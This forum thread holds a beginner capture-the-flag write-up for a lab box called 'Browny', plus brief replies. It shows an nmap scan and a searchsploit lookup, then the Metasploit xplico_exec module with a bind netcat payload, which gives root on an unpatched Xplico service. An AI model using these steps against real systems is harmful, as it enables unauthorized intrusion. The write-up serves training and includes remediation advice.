• Members 1 post
    May 18, 2019, 10:38 p.m.

    Browny Writeup

    Browny was a sweet and easy box as its name sounds. It's a great box for beginners to test their skills.

    Machine Name: Browny
    Machine IP: 10.1.1.17
    Machine Difficulty: 1/10
    Creator: H4d3s

    Overview

    • Port Scan
    • Explore Port 9876
    • Find Unauthenticated Remote Code Execution for software running on Port 9876
    • Use Metasploit to exploit

    Writeup

    Using nmap to scan the host:
    nmap -sV 10.1.1.17
    i.imgur.com/uBxmv6g.png

    Browsing to Port 9876 using the Web Browser, we can see Xplico running:
    One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum of the file. Name of the for this operation is directly taken from user input and then used at inside of the command without proper input validation.
    i.imgur.com/5a0hDfK.png

    Using Searchsploit we can see there is a RCE:
    searchsploit 'Xplico'
    i.imgur.com/Zyf4fTw.png

    We can also Google Xplico Exploit:
    i.imgur.com/NZchake.png

    Setting up Metasploit with the correct module:
    msf5 > use exploit/linux/http/xplico_exec
    i.imgur.com/D67iKn9.png

    Setting the correct payload:
    msf5 > show payloads
    msf5 > set Payload cmd/unix/bind_netcat
    i.imgur.com/nk2XMKM.png

    After running the module we will notice there is no prompt, however if we type in a command we see that we have a shell:
    id
    i.imgur.com/BlPrBD9.png

    We see that we are root, as Xplico was running as root.

    Remediation

    • Patch software
    • Try avoiding running services as root if possible. Create special accounts for the purpose of running a service to help isolate in case an attacker is able to break in.

    Thank you for reading.

    EOF

  • May 18, 2019, 10:48 p.m.

    Very cool writeup 😊

  • Members 1 post
    May 20, 2019, 4:03 p.m.

    Is there a place where I can see which machine will be retired? I would like to create writeups and YouTube videos, but I need to know wich machine will be retired to prepare the writeup and public it after the machine be retired

  • May 20, 2019, 8:10 p.m.

    Hey !! For the moment stay tuned on the social networks .